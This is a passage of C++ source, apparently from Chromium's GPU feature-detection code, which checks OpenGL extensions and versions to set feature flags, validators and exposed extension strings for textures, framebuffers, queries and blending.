GL_DEPTH_STENCIL); 
validators_.texture_stencil_renderable_internal_format.AddValue( GL_DEPTH_STENCIL); } validators_.render_buffer_format.AddValue(GL_DEPTH24_STENCIL8); if (context_type_ == CONTEXT_TYPE_WEBGL1) { validators_.attachment.AddValue(GL_DEPTH_STENCIL_ATTACHMENT); validators_.attachment_query.AddValue(GL_DEPTH_STENCIL_ATTACHMENT); } } if (gl_version_info_->is_es3 || gl_version_info_->is_desktop_core_profile || gfx::HasExtension(extensions, "GL_OES_vertex_array_object") || gfx::HasExtension(extensions, "GL_ARB_vertex_array_object") || gfx::HasExtension(extensions, "GL_APPLE_vertex_array_object")) { feature_flags_.native_vertex_array_object = true; } if (workarounds_.use_client_side_arrays_for_stream_buffers) { feature_flags_.native_vertex_array_object = false; } if (gl_version_info_->is_es3 || gfx::HasExtension(extensions, "GL_OES_element_index_uint") || gl::HasDesktopGLFeatures()) { AddExtensionString("GL_OES_element_index_uint"); validators_.index_type.AddValue(GL_UNSIGNED_INT); } bool has_srgb_framebuffer_support = false; if (gl_version_info_->IsAtLeastGL(3, 2) || (gl_version_info_->IsAtLeastGL(2, 0) && (gfx::HasExtension(extensions, "GL_EXT_framebuffer_sRGB") || gfx::HasExtension(extensions, "GL_ARB_framebuffer_sRGB")))) { feature_flags_.desktop_srgb_support = true; has_srgb_framebuffer_support = true; } if ((((gl_version_info_->is_es3 || gfx::HasExtension(extensions, "GL_OES_rgb8_rgba8")) && gfx::HasExtension(extensions, "GL_EXT_sRGB")) || feature_flags_.desktop_srgb_support) && IsWebGL1OrES2Context()) { feature_flags_.ext_srgb = true; AddExtensionString("GL_EXT_sRGB"); validators_.texture_internal_format.AddValue(GL_SRGB_EXT); validators_.texture_internal_format.AddValue(GL_SRGB_ALPHA_EXT); validators_.texture_format.AddValue(GL_SRGB_EXT); validators_.texture_format.AddValue(GL_SRGB_ALPHA_EXT); validators_.render_buffer_format.AddValue(GL_SRGB8_ALPHA8_EXT); validators_.framebuffer_attachment_parameter.AddValue( GL_FRAMEBUFFER_ATTACHMENT_COLOR_ENCODING_EXT); validators_.texture_unsized_internal_format.AddValue(GL_SRGB_EXT); validators_.texture_unsized_internal_format.AddValue(GL_SRGB_ALPHA_EXT); has_srgb_framebuffer_support = true; } if (gl_version_info_->is_es3) has_srgb_framebuffer_support = true; if (has_srgb_framebuffer_support && !IsWebGLContext()) { if (feature_flags_.desktop_srgb_support || gfx::HasExtension(extensions, "GL_EXT_sRGB_write_control")) { feature_flags_.ext_srgb_write_control = true; AddExtensionString("GL_EXT_sRGB_write_control"); validators_.capability.AddValue(GL_FRAMEBUFFER_SRGB_EXT); } } if (gfx::HasExtension(extensions, "GL_EXT_texture_sRGB_decode") && !IsWebGLContext()) { AddExtensionString("GL_EXT_texture_sRGB_decode"); validators_.texture_parameter.AddValue(GL_TEXTURE_SRGB_DECODE_EXT); } bool have_s3tc_srgb = false; if (gl_version_info_->is_es) { have_s3tc_srgb = gfx::HasExtension(extensions, "GL_NV_sRGB_formats") || gfx::HasExtension(extensions, "GL_EXT_texture_compression_s3tc_srgb"); } else { if (gfx::HasExtension(extensions, "GL_EXT_texture_sRGB") || gl_version_info_->IsAtLeastGL(4, 1)) { have_s3tc_srgb = gfx::HasExtension(extensions, "GL_EXT_texture_compression_s3tc"); } } if (have_s3tc_srgb) { AddExtensionString("GL_EXT_texture_compression_s3tc_srgb"); validators_.compressed_texture_format.AddValue( GL_COMPRESSED_SRGB_S3TC_DXT1_EXT); validators_.compressed_texture_format.AddValue( GL_COMPRESSED_SRGB_ALPHA_S3TC_DXT1_EXT); validators_.compressed_texture_format.AddValue( GL_COMPRESSED_SRGB_ALPHA_S3TC_DXT3_EXT); validators_.compressed_texture_format.AddValue( 
GL_COMPRESSED_SRGB_ALPHA_S3TC_DXT5_EXT); validators_.texture_internal_format_storage.AddValue( GL_COMPRESSED_SRGB_S3TC_DXT1_EXT); validators_.texture_internal_format_storage.AddValue( GL_COMPRESSED_SRGB_ALPHA_S3TC_DXT1_EXT); validators_.texture_internal_format_storage.AddValue( GL_COMPRESSED_SRGB_ALPHA_S3TC_DXT3_EXT); validators_.texture_internal_format_storage.AddValue( GL_COMPRESSED_SRGB_ALPHA_S3TC_DXT5_EXT); } bool has_apple_bgra = gfx::HasExtension(extensions, "GL_APPLE_texture_format_BGRA8888"); bool has_ext_bgra = gfx::HasExtension(extensions, "GL_EXT_texture_format_BGRA8888"); bool enable_texture_format_bgra8888 = has_ext_bgra || has_apple_bgra || !gl_version_info_->is_es; bool has_ext_texture_storage = gfx::HasExtension(extensions, "GL_EXT_texture_storage"); bool has_arb_texture_storage = gfx::HasExtension(extensions, "GL_ARB_texture_storage"); bool has_texture_storage = !workarounds_.disable_texture_storage && (has_ext_texture_storage || has_arb_texture_storage || gl_version_info_->is_es3 || gl_version_info_->IsAtLeastGL(4, 2)); bool enable_texture_storage = has_texture_storage; bool texture_storage_incompatible_with_bgra = gl_version_info_->is_es3 && !has_ext_texture_storage && !has_apple_bgra; if (texture_storage_incompatible_with_bgra && enable_texture_format_bgra8888 && enable_texture_storage) { switch (context_type_) { case CONTEXT_TYPE_OPENGLES2: enable_texture_storage = false; break; case CONTEXT_TYPE_OPENGLES3: enable_texture_format_bgra8888 = false; break; case CONTEXT_TYPE_WEBGL1: case CONTEXT_TYPE_WEBGL2: case CONTEXT_TYPE_WEBGL2_COMPUTE: case CONTEXT_TYPE_WEBGPU: break; } } if (enable_texture_storage) { feature_flags_.ext_texture_storage = true; AddExtensionString("GL_EXT_texture_storage"); validators_.texture_parameter.AddValue(GL_TEXTURE_IMMUTABLE_FORMAT_EXT); } if (enable_texture_format_bgra8888) { feature_flags_.ext_texture_format_bgra8888 = true; AddExtensionString("GL_EXT_texture_format_BGRA8888"); validators_.texture_internal_format.AddValue(GL_BGRA_EXT); validators_.texture_format.AddValue(GL_BGRA_EXT); validators_.texture_unsized_internal_format.AddValue(GL_BGRA_EXT); validators_.texture_internal_format_storage.AddValue(GL_BGRA8_EXT); validators_.texture_sized_color_renderable_internal_format.AddValue( GL_BGRA8_EXT); validators_.texture_sized_texture_filterable_internal_format.AddValue( GL_BGRA8_EXT); feature_flags_.gpu_memory_buffer_formats.Add(gfx::BufferFormat::BGRA_8888); feature_flags_.gpu_memory_buffer_formats.Add(gfx::BufferFormat::BGRX_8888); } bool enable_render_buffer_bgra = gl_version_info_->is_angle || !gl_version_info_->is_es; if (enable_render_buffer_bgra) { feature_flags_.ext_render_buffer_format_bgra8888 = true; AddExtensionString("GL_CHROMIUM_renderbuffer_format_BGRA8888"); validators_.render_buffer_format.AddValue(GL_BGRA8_EXT); } bool enable_read_format_bgra = gfx::HasExtension(extensions, "GL_EXT_read_format_bgra") || !gl_version_info_->is_es; if (enable_read_format_bgra) { feature_flags_.ext_read_format_bgra = true; AddExtensionString("GL_EXT_read_format_bgra"); validators_.read_pixel_format.AddValue(GL_BGRA_EXT); } feature_flags_.arb_es3_compatibility = gfx::HasExtension(extensions, "GL_ARB_ES3_compatibility") && !gl_version_info_->is_es; feature_flags_.ext_disjoint_timer_query = gfx::HasExtension(extensions, "GL_EXT_disjoint_timer_query"); if (feature_flags_.ext_disjoint_timer_query || gfx::HasExtension(extensions, "GL_ARB_timer_query") || gfx::HasExtension(extensions, "GL_EXT_timer_query")) { 
AddExtensionString("GL_EXT_disjoint_timer_query"); } if (gfx::HasExtension(extensions, "GL_OES_rgb8_rgba8") || gl::HasDesktopGLFeatures()) { AddExtensionString("GL_OES_rgb8_rgba8"); validators_.render_buffer_format.AddValue(GL_RGB8_OES); validators_.render_buffer_format.AddValue(GL_RGBA8_OES); } if (!disallowed_features_.npot_support && (gl_version_info_->is_es3 || gl_version_info_->is_desktop_core_profile || gfx::HasExtension(extensions, "GL_ARB_texture_non_power_of_two") || gfx::HasExtension(extensions, "GL_OES_texture_npot"))) { AddExtensionString("GL_OES_texture_npot"); feature_flags_.npot_ok = true; } InitializeFloatAndHalfFloatFeatures(extensions); if (!workarounds_.disable_chromium_framebuffer_multisample) { bool ext_has_multisample = gfx::HasExtension(extensions, "GL_ARB_framebuffer_object") || (gfx::HasExtension(extensions, "GL_EXT_framebuffer_multisample") && gfx::HasExtension(extensions, "GL_EXT_framebuffer_blit")) || gl_version_info_->is_es3 || gl_version_info_->is_desktop_core_profile; if (gl_version_info_->is_angle || gl_version_info_->is_swiftshader) { ext_has_multisample |= gfx::HasExtension(extensions, "GL_ANGLE_framebuffer_multisample"); } if (ext_has_multisample) { feature_flags_.chromium_framebuffer_multisample = true; validators_.framebuffer_target.AddValue(GL_READ_FRAMEBUFFER_EXT); validators_.framebuffer_target.AddValue(GL_DRAW_FRAMEBUFFER_EXT); validators_.g_l_state.AddValue(GL_READ_FRAMEBUFFER_BINDING_EXT); validators_.g_l_state.AddValue(GL_MAX_SAMPLES_EXT); validators_.render_buffer_parameter.AddValue(GL_RENDERBUFFER_SAMPLES_EXT); AddExtensionString("GL_CHROMIUM_framebuffer_multisample"); } } if (gfx::HasExtension(extensions, "GL_EXT_multisampled_render_to_texture")) { feature_flags_.multisampled_render_to_texture = true; } else if (gfx::HasExtension(extensions, "GL_IMG_multisampled_render_to_texture")) { feature_flags_.multisampled_render_to_texture = true; feature_flags_.use_img_for_multisampled_render_to_texture = true; } if (feature_flags_.multisampled_render_to_texture) { validators_.render_buffer_parameter.AddValue(GL_RENDERBUFFER_SAMPLES_EXT); validators_.g_l_state.AddValue(GL_MAX_SAMPLES_EXT); validators_.framebuffer_attachment_parameter.AddValue( GL_FRAMEBUFFER_ATTACHMENT_TEXTURE_SAMPLES_EXT); AddExtensionString("GL_EXT_multisampled_render_to_texture"); } if (!gl_version_info_->is_es || gfx::HasExtension(extensions, "GL_EXT_multisample_compatibility")) { AddExtensionString("GL_EXT_multisample_compatibility"); feature_flags_.ext_multisample_compatibility = true; validators_.capability.AddValue(GL_MULTISAMPLE_EXT); validators_.capability.AddValue(GL_SAMPLE_ALPHA_TO_ONE_EXT); } if (gfx::HasExtension(extensions, "GL_INTEL_framebuffer_CMAA")) { feature_flags_.chromium_screen_space_antialiasing = true; AddExtensionString("GL_CHROMIUM_screen_space_antialiasing"); } else if (gl_version_info_->IsAtLeastGLES(3, 1) || (gl_version_info_->IsAtLeastGL(3, 0) && gfx::HasExtension(extensions, "GL_ARB_shading_language_420pack") && gfx::HasExtension(extensions, "GL_ARB_texture_storage") && gfx::HasExtension(extensions, "GL_ARB_texture_gather") && gfx::HasExtension(extensions, "GL_ARB_explicit_uniform_location") && gfx::HasExtension(extensions, "GL_ARB_explicit_attrib_location") && gfx::HasExtension(extensions, "GL_ARB_shader_image_load_store"))) { feature_flags_.chromium_screen_space_antialiasing = true; feature_flags_.use_chromium_screen_space_antialiasing_via_shaders = true; AddExtensionString("GL_CHROMIUM_screen_space_antialiasing"); } if (gfx::HasExtension(extensions, 
"GL_OES_depth24") || gl::HasDesktopGLFeatures() || gl_version_info_->is_es3) { AddExtensionString("GL_OES_depth24"); feature_flags_.oes_depth24 = true; validators_.render_buffer_format.AddValue(GL_DEPTH_COMPONENT24); } if (gl_version_info_->is_es3 || gfx::HasExtension(extensions, "GL_OES_standard_derivatives") || gl::HasDesktopGLFeatures()) { AddExtensionString("GL_OES_standard_derivatives"); feature_flags_.oes_standard_derivatives = true; validators_.hint_target.AddValue(GL_FRAGMENT_SHADER_DERIVATIVE_HINT_OES); validators_.g_l_state.AddValue(GL_FRAGMENT_SHADER_DERIVATIVE_HINT_OES); } if (gfx::HasExtension(extensions, "GL_CHROMIUM_texture_filtering_hint")) { AddExtensionString("GL_CHROMIUM_texture_filtering_hint"); feature_flags_.chromium_texture_filtering_hint = true; validators_.hint_target.AddValue(GL_TEXTURE_FILTERING_HINT_CHROMIUM); validators_.g_l_state.AddValue(GL_TEXTURE_FILTERING_HINT_CHROMIUM); } if (gfx::HasExtension(extensions, "GL_OES_EGL_image_external")) { AddExtensionString("GL_OES_EGL_image_external"); feature_flags_.oes_egl_image_external = true; } if (gfx::HasExtension(extensions, "GL_NV_EGL_stream_consumer_external")) { AddExtensionString("GL_NV_EGL_stream_consumer_external"); feature_flags_.nv_egl_stream_consumer_external = true; } if (feature_flags_.oes_egl_image_external || feature_flags_.nv_egl_stream_consumer_external) { validators_.texture_bind_target.AddValue(GL_TEXTURE_EXTERNAL_OES); validators_.get_tex_param_target.AddValue(GL_TEXTURE_EXTERNAL_OES); validators_.texture_parameter.AddValue(GL_REQUIRED_TEXTURE_IMAGE_UNITS_OES); validators_.g_l_state.AddValue(GL_TEXTURE_BINDING_EXTERNAL_OES); } if (gfx::HasExtension(extensions, "GL_OES_compressed_ETC1_RGB8_texture") && !gl_version_info_->is_angle) { AddExtensionString("GL_OES_compressed_ETC1_RGB8_texture"); feature_flags_.oes_compressed_etc1_rgb8_texture = true; validators_.compressed_texture_format.AddValue(GL_ETC1_RGB8_OES); validators_.texture_internal_format_storage.AddValue(GL_ETC1_RGB8_OES); } if (gfx::HasExtension(extensions, "GL_CHROMIUM_compressed_texture_etc") || (gl_version_info_->is_es3 && !gl_version_info_->is_angle)) { AddExtensionString("GL_CHROMIUM_compressed_texture_etc"); validators_.UpdateETCCompressedTextureFormats(); } if (gfx::HasExtension(extensions, "GL_AMD_compressed_ATC_texture")) { AddExtensionString("GL_AMD_compressed_ATC_texture"); validators_.compressed_texture_format.AddValue(GL_ATC_RGB_AMD); validators_.compressed_texture_format.AddValue( GL_ATC_RGBA_EXPLICIT_ALPHA_AMD); validators_.compressed_texture_format.AddValue( GL_ATC_RGBA_INTERPOLATED_ALPHA_AMD); validators_.texture_internal_format_storage.AddValue(GL_ATC_RGB_AMD); validators_.texture_internal_format_storage.AddValue( GL_ATC_RGBA_EXPLICIT_ALPHA_AMD); validators_.texture_internal_format_storage.AddValue( GL_ATC_RGBA_INTERPOLATED_ALPHA_AMD); } if (gfx::HasExtension(extensions, "GL_IMG_texture_compression_pvrtc")) { AddExtensionString("GL_IMG_texture_compression_pvrtc"); validators_.compressed_texture_format.AddValue( GL_COMPRESSED_RGB_PVRTC_4BPPV1_IMG); validators_.compressed_texture_format.AddValue( GL_COMPRESSED_RGB_PVRTC_2BPPV1_IMG); validators_.compressed_texture_format.AddValue( GL_COMPRESSED_RGBA_PVRTC_4BPPV1_IMG); validators_.compressed_texture_format.AddValue( GL_COMPRESSED_RGBA_PVRTC_2BPPV1_IMG); validators_.texture_internal_format_storage.AddValue( GL_COMPRESSED_RGB_PVRTC_4BPPV1_IMG); validators_.texture_internal_format_storage.AddValue( GL_COMPRESSED_RGB_PVRTC_2BPPV1_IMG); 
validators_.texture_internal_format_storage.AddValue( GL_COMPRESSED_RGBA_PVRTC_4BPPV1_IMG); validators_.texture_internal_format_storage.AddValue( GL_COMPRESSED_RGBA_PVRTC_2BPPV1_IMG); } if (gfx::HasExtension(extensions, "GL_ARB_texture_rectangle") || gfx::HasExtension(extensions, "GL_ANGLE_texture_rectangle") || gl_version_info_->is_desktop_core_profile) { AddExtensionString("GL_ARB_texture_rectangle"); feature_flags_.arb_texture_rectangle = true; validators_.texture_bind_target.AddValue(GL_TEXTURE_RECTANGLE_ARB); validators_.texture_target.AddValue(GL_TEXTURE_RECTANGLE_ARB); validators_.get_tex_param_target.AddValue(GL_TEXTURE_RECTANGLE_ARB); validators_.g_l_state.AddValue(GL_TEXTURE_BINDING_RECTANGLE_ARB); } #if defined(OS_MACOSX) || defined(OS_CHROMEOS) AddExtensionString("GL_CHROMIUM_ycbcr_420v_image"); feature_flags_.chromium_image_ycbcr_420v = true; #endif if (feature_flags_.chromium_image_ycbcr_420v) { feature_flags_.gpu_memory_buffer_formats.Add( gfx::BufferFormat::YUV_420_BIPLANAR); } if (gfx::HasExtension(extensions, "GL_APPLE_ycbcr_422")) { AddExtensionString("GL_CHROMIUM_ycbcr_422_image"); feature_flags_.chromium_image_ycbcr_422 = true; feature_flags_.gpu_memory_buffer_formats.Add(gfx::BufferFormat::UYVY_422); } #if defined(OS_MACOSX) feature_flags_.chromium_image_xr30 = base::mac::IsAtLeastOS10_13(); #elif !defined(OS_WIN) feature_flags_.chromium_image_xb30 = gl_version_info_->IsAtLeastGL(3, 3) || gl_version_info_->IsAtLeastGLES(3, 0) || gfx::HasExtension(extensions, "GL_EXT_texture_type_2_10_10_10_REV"); #endif if (feature_flags_.chromium_image_xr30 || feature_flags_.chromium_image_xb30) { validators_.texture_internal_format.AddValue(GL_RGB10_A2_EXT); validators_.render_buffer_format.AddValue(GL_RGB10_A2_EXT); validators_.texture_internal_format_storage.AddValue(GL_RGB10_A2_EXT); validators_.pixel_type.AddValue(GL_UNSIGNED_INT_2_10_10_10_REV); } if (feature_flags_.chromium_image_xr30) { feature_flags_.gpu_memory_buffer_formats.Add( gfx::BufferFormat::BGRX_1010102); } if (feature_flags_.chromium_image_xb30) { feature_flags_.gpu_memory_buffer_formats.Add( gfx::BufferFormat::RGBX_1010102); } if (gfx::HasExtension(extensions, "GL_ANGLE_texture_usage")) { feature_flags_.angle_texture_usage = true; AddExtensionString("GL_ANGLE_texture_usage"); validators_.texture_parameter.AddValue(GL_TEXTURE_USAGE_ANGLE); } bool have_occlusion_query = gl_version_info_->IsAtLeastGLES(3, 0) || gl_version_info_->IsAtLeastGL(3, 3); bool have_ext_occlusion_query_boolean = gfx::HasExtension(extensions, "GL_EXT_occlusion_query_boolean"); bool have_arb_occlusion_query2 = gfx::HasExtension(extensions, "GL_ARB_occlusion_query2"); bool have_arb_occlusion_query = (gl_version_info_->is_desktop_core_profile && gl_version_info_->IsAtLeastGL(1, 5)) || gfx::HasExtension(extensions, "GL_ARB_occlusion_query"); if (have_occlusion_query || have_ext_occlusion_query_boolean || have_arb_occlusion_query2 || have_arb_occlusion_query) { feature_flags_.occlusion_query = have_arb_occlusion_query; if (context_type_ == CONTEXT_TYPE_OPENGLES2) { AddExtensionString("GL_EXT_occlusion_query_boolean"); } feature_flags_.occlusion_query_boolean = true; feature_flags_.use_arb_occlusion_query2_for_occlusion_query_boolean = !have_ext_occlusion_query_boolean && (have_arb_occlusion_query2 || (gl_version_info_->IsAtLeastGL(3, 3) && gl_version_info_->IsLowerThanGL(4, 3))); feature_flags_.use_arb_occlusion_query_for_occlusion_query_boolean = !have_ext_occlusion_query_boolean && have_arb_occlusion_query && !have_arb_occlusion_query2; } if 
(gfx::HasExtension(extensions, "GL_ANGLE_instanced_arrays") || (gfx::HasExtension(extensions, "GL_ARB_instanced_arrays") && gfx::HasExtension(extensions, "GL_ARB_draw_instanced")) || gl_version_info_->is_es3 || gl_version_info_->is_desktop_core_profile) { AddExtensionString("GL_ANGLE_instanced_arrays"); feature_flags_.angle_instanced_arrays = true; validators_.vertex_attribute.AddValue(GL_VERTEX_ATTRIB_ARRAY_DIVISOR_ANGLE); } bool have_es2_draw_buffers_vendor_agnostic = gl_version_info_->is_desktop_core_profile || gfx::HasExtension(extensions, "GL_ARB_draw_buffers") || gfx::HasExtension(extensions, "GL_EXT_draw_buffers"); bool can_emulate_es2_draw_buffers_on_es3_nv = gl_version_info_->is_es3 && gfx::HasExtension(extensions, "GL_NV_draw_buffers"); bool is_webgl_compatibility_context = gfx::HasExtension(extensions, "GL_ANGLE_webgl_compatibility"); bool have_es2_draw_buffers = !workarounds_.disable_ext_draw_buffers && (have_es2_draw_buffers_vendor_agnostic || can_emulate_es2_draw_buffers_on_es3_nv) && (context_type_ == CONTEXT_TYPE_OPENGLES2 || (context_type_ == CONTEXT_TYPE_WEBGL1 && IsWebGLDrawBuffersSupported(is_webgl_compatibility_context, depth_texture_format, depth_stencil_texture_format))); if (have_es2_draw_buffers) { AddExtensionString("GL_EXT_draw_buffers"); feature_flags_.ext_draw_buffers = true; feature_flags_.nv_draw_buffers = can_emulate_es2_draw_buffers_on_es3_nv && !have_es2_draw_buffers_vendor_agnostic; } if (IsWebGL2OrES3OrHigherContext() || have_es2_draw_buffers) { GLint max_color_attachments = 0; glGetIntegerv(GL_MAX_COLOR_ATTACHMENTS_EXT, &max_color_attachments); for (GLenum i = GL_COLOR_ATTACHMENT1_EXT; i < static_cast<GLenum>(GL_COLOR_ATTACHMENT0 + max_color_attachments); ++i) { validators_.attachment.AddValue(i); validators_.attachment_query.AddValue(i); } static_assert(GL_COLOR_ATTACHMENT0_EXT == GL_COLOR_ATTACHMENT0, "GL_COLOR_ATTACHMENT0_EXT should equal GL_COLOR_ATTACHMENT0"); validators_.g_l_state.AddValue(GL_MAX_COLOR_ATTACHMENTS_EXT); validators_.g_l_state.AddValue(GL_MAX_DRAW_BUFFERS_ARB); GLint max_draw_buffers = 0; glGetIntegerv(GL_MAX_DRAW_BUFFERS_ARB, &max_draw_buffers); for (GLenum i = GL_DRAW_BUFFER0_ARB; i < static_cast<GLenum>(GL_DRAW_BUFFER0_ARB + max_draw_buffers); ++i) { validators_.g_l_state.AddValue(i); } } if (gl_version_info_->is_es3 || gfx::HasExtension(extensions, "GL_EXT_blend_minmax") || gl::HasDesktopGLFeatures()) { AddExtensionString("GL_EXT_blend_minmax"); validators_.equation.AddValue(GL_MIN_EXT); validators_.equation.AddValue(GL_MAX_EXT); static_assert(GL_MIN_EXT == GL_MIN && GL_MAX_EXT == GL_MAX, "min & max variations must match"); } if (gfx::HasExtension(extensions, "GL_EXT_frag_depth") || gl::HasDesktopGLFeatures()) { AddExtensionString("GL_EXT_frag_depth"); feature_flags_.ext_frag_depth = true; } if (gfx::HasExtension(extensions, "GL_EXT_shader_texture_lod") || gl::HasDesktopGLFeatures()) { AddExtensionString("GL_EXT_shader_texture_lod"); feature_flags_.ext_shader_texture_lod = true; } bool ui_gl_fence_works = gl::GLFence::IsSupported(); UMA_HISTOGRAM_BOOLEAN("GPU.FenceSupport", ui_gl_fence_works); feature_flags_.map_buffer_range = gl_version_info_->is_es3 || gl_version_info_->is_desktop_core_profile || gfx::HasExtension(extensions, "GL_ARB_map_buffer_range") || gfx::HasExtension(extensions, "GL_EXT_map_buffer_range"); if (has_pixel_buffers && ui_gl_fence_works && !workarounds_.disable_async_readpixels) { feature_flags_.use_async_readpixels = true; } if (gl_version_info_->is_es3 || gfx::HasExtension(extensions, 
"GL_ARB_sampler_objects")) { feature_flags_.enable_samplers = true; } if ((gl_version_info_->is_es3 || gfx::HasExtension(extensions, "GL_EXT_discard_framebuffer")) && !workarounds_.disable_discard_framebuffer) { AddExtensionString("GL_EXT_discard_framebuffer"); feature_flags_.ext_discard_framebuffer = true; } if (ui_gl_fence_works) { AddExtensionString("GL_CHROMIUM_sync_query"); feature_flags_.chromium_sync_query = true; } if (!workarounds_.disable_blend_equation_advanced) { bool blend_equation_advanced_coherent = gfx::HasExtension(extensions, "GL_NV_blend_equation_advanced_coherent") || gfx::HasExtension(extensions, "GL_KHR_blend_equation_advanced_coherent"); if (blend_equation_advanced_coherent || gfx::HasExtension(extensions, "GL_NV_blend_equation_advanced") || gfx::HasExtension(extensions, "GL_KHR_blend_equation_advanced")) { const GLenum equations[] = { GL_MULTIPLY_KHR, GL_SCREEN_KHR, GL_OVERLAY_KHR, GL_DARKEN_KHR, GL_LIGHTEN_KHR, GL_COLORDODGE_KHR, GL_COLORBURN_KHR, GL_HARDLIGHT_KHR, GL_SOFTLIGHT_KHR, GL_DIFFERENCE_KHR, GL_EXCLUSION_KHR, GL_HSL_HUE_KHR, GL_HSL_SATURATION_KHR, GL_HSL_COLOR_KHR, GL_HSL_LUMINOSITY_KHR}; for (GLenum equation : equations) validators_.equation.AddValue(equation); if (blend_equation_advanced_coherent) AddExtensionString("GL_KHR_blend_equation_advanced_coherent"); AddExtensionString("GL_KHR_blend_equation_advanced"); feature_flags_.blend_equation_advanced = true; feature_flags_.blend_equation_advanced_coherent = blend_equation_advanced_coherent; } } if (gfx::HasExtension(extensions, "GL_NV_framebuffer_mixed_samples")) { AddExtensionString("GL_CHROMIUM_framebuffer_mixed_samples"); feature_flags_.chromium_framebuffer_mixed_samples = true; validators_.g_l_state.AddValue(GL_COVERAGE_MODULATION_CHROMIUM); } if (gfx::HasExtension(extensions, "GL_NV_path_rendering")) { bool has_dsa = gl_version_info_->IsAtLeastGL(4, 5) || gfx::HasExtension(extensions, "GL_EXT_direct_state_access"); bool has_piq = gl_version_info_->IsAtLeastGL(4, 3) || gfx::HasExtension(extensions, "GL_ARB_program_interface_query"); bool has_fms = feature_flags_.chromium_framebuffer_mixed_samples; if ((gl_version_info_->IsAtLeastGLES(3, 1) || (gl_version_info_->IsAtLeastGL(3, 2) && has_dsa && has_piq)) && has_fms) { AddExtensionString("GL_CHROMIUM_path_rendering"); feature_flags_.chromium_path_rendering = true; validators_.g_l_state.AddValue(GL_PATH_MODELVIEW_MATRIX_CHROMIUM); validators_.g_l_state.AddValue(GL_PATH_PROJECTION_MATRIX_CHROMIUM); validators_.g_l_state.AddValue(GL_PATH_STENCIL_FUNC_CHROMIUM); validators_.g_l_state.AddValue(GL_PATH_STENCIL_REF_CHROMIUM); validators_.g_l_state.AddValue(GL_PATH_STENCIL_VALUE_MASK_CHROMIUM); } } if ((gl_version_info_->is_es3 || gl_version_info_->is_desktop_core_profile || gfx::HasExtension(extensions, "GL_EXT_texture_rg") || gfx::HasExtension(extensions, "GL_ARB_texture_rg")) && IsGL_REDSupportedOnFBOs()) { feature_flags_.ext_texture_rg = true; AddExtensionString("GL_EXT_texture_rg"); validators_.texture_format.AddValue(GL_RED_EXT); validators_.texture_format.AddValue(GL_RG_EXT); validators_.texture_internal_format.AddValue(GL_RED_EXT); validators_.texture_internal_format.AddValue(GL_R8_EXT); validators_.texture_internal_format.AddValue(GL_RG_EXT); validators_.texture_internal_format.AddValue(GL_RG8_EXT); validators_.read_pixel_format.AddValue(GL_RED_EXT); validators_.read_pixel_format.AddValue(GL_RG_EXT); validators_.render_buffer_format.AddValue(GL_R8_EXT); validators_.render_buffer_format.AddValue(GL_RG8_EXT); 
validators_.texture_unsized_internal_format.AddValue(GL_RED_EXT); validators_.texture_unsized_internal_format.AddValue(GL_RG_EXT); validators_.texture_internal_format_storage.AddValue(GL_R8_EXT); validators_.texture_internal_format_storage.AddValue(GL_RG8_EXT); feature_flags_.gpu_memory_buffer_formats.Add(gfx::BufferFormat::R_8); feature_flags_.gpu_memory_buffer_formats.Add(gfx::BufferFormat::RG_88); } UMA_HISTOGRAM_BOOLEAN("GPU.TextureRG", feature_flags_.ext_texture_rg); if (gl_version_info_->is_desktop_core_profile || (gl_version_info_->IsAtLeastGL(2, 1) && gfx::HasExtension(extensions, "GL_ARB_texture_rg")) || gfx::HasExtension(extensions, "GL_EXT_texture_norm16")) { feature_flags_.ext_texture_norm16 = true; g_r16_is_present = true; validators_.pixel_type.AddValue(GL_UNSIGNED_SHORT); validators_.texture_format.AddValue(GL_RED_EXT); validators_.texture_internal_format.AddValue(GL_R16_EXT); validators_.texture_internal_format.AddValue(GL_RED_EXT); validators_.texture_unsized_internal_format.AddValue(GL_RED_EXT); validators_.texture_internal_format_storage.AddValue(GL_R16_EXT); feature_flags_.gpu_memory_buffer_formats.Add(gfx::BufferFormat::R_16); } UMA_HISTOGRAM_ENUMERATION( "GPU.TextureR16Ext_LuminanceF16", GpuTextureUMAHelper(), static_cast<int>(GpuTextureResultR16_L16::kMax) + 1); if (enable_es3 && gfx::HasExtension(extensions, "GL_EXT_window_rectangles")) { AddExtensionString("GL_EXT_window_rectangles"); feature_flags_.ext_window_rectangles = true; validators_.g_l_state.AddValue(GL_WINDOW_RECTANGLE_MODE_EXT); validators_.g_l_state.AddValue(GL_MAX_WINDOW_RECTANGLES_EXT); validators_.g_l_state.AddValue(GL_NUM_WINDOW_RECTANGLES_EXT); validators_.indexed_g_l_state.AddValue(GL_WINDOW_RECTANGLE_EXT); } bool has_opengl_dual_source_blending = gl_version_info_->IsAtLeastGL(3, 3) || (gl_version_info_->IsAtLeastGL(3, 2) && gfx::HasExtension(extensions, "GL_ARB_blend_func_extended")); if (!disable_shader_translator_ && !workarounds_.get_frag_data_info_bug && ((gl_version_info_->IsAtLeastGL(3, 2) && has_opengl_dual_source_blending) || (gl_version_info_->IsAtLeastGLES(3, 0) && gfx::HasExtension(extensions, "GL_EXT_blend_func_extended")))) { feature_flags_.ext_blend_func_extended = true; AddExtensionString("GL_EXT_blend_func_extended"); validators_.dst_blend_factor.AddValue(GL_SRC_ALPHA_SATURATE_EXT); validators_.src_blend_factor.AddValue(GL_SRC1_ALPHA_EXT); validators_.dst_blend_factor.AddValue(GL_SRC1_ALPHA_EXT); validators_.src_blend_factor.AddValue(GL_SRC1_COLOR_EXT); validators_.dst_blend_factor.AddValue(GL_SRC1_COLOR_EXT); validators_.src_blend_factor.AddValue(GL_ONE_MINUS_SRC1_COLOR_EXT); validators_.dst_blend_factor.AddValue(GL_ONE_MINUS_SRC1_COLOR_EXT); validators_.src_blend_factor.AddValue(GL_ONE_MINUS_SRC1_ALPHA_EXT); validators_.dst_blend_factor.AddValue(GL_ONE_MINUS_SRC1_ALPHA_EXT); validators_.g_l_state.AddValue(GL_MAX_DUAL_SOURCE_DRAW_BUFFERS_EXT); } #if !defined(OS_MACOSX) if (workarounds_.ignore_egl_sync_failures) { gl::GLFenceEGL::SetIgnoreFailures(); } #endif if (workarounds_.avoid_egl_image_target_texture_reuse) { TextureDefinition::AvoidEGLTargetTextureReuse(); } if (gl_version_info_->IsLowerThanGL(4, 3)) { feature_flags_.emulate_primitive_restart_fixed_index = true; } feature_flags_.angle_robust_client_memory = gfx::HasExtension(extensions, "GL_ANGLE_robust_client_memory"); feature_flags_.khr_debug = gl_version_info_->IsAtLeastGL(4, 3) || gl_version_info_->IsAtLeastGLES(3, 2) || gfx::HasExtension(extensions, "GL_KHR_debug"); feature_flags_.chromium_gpu_fence = 
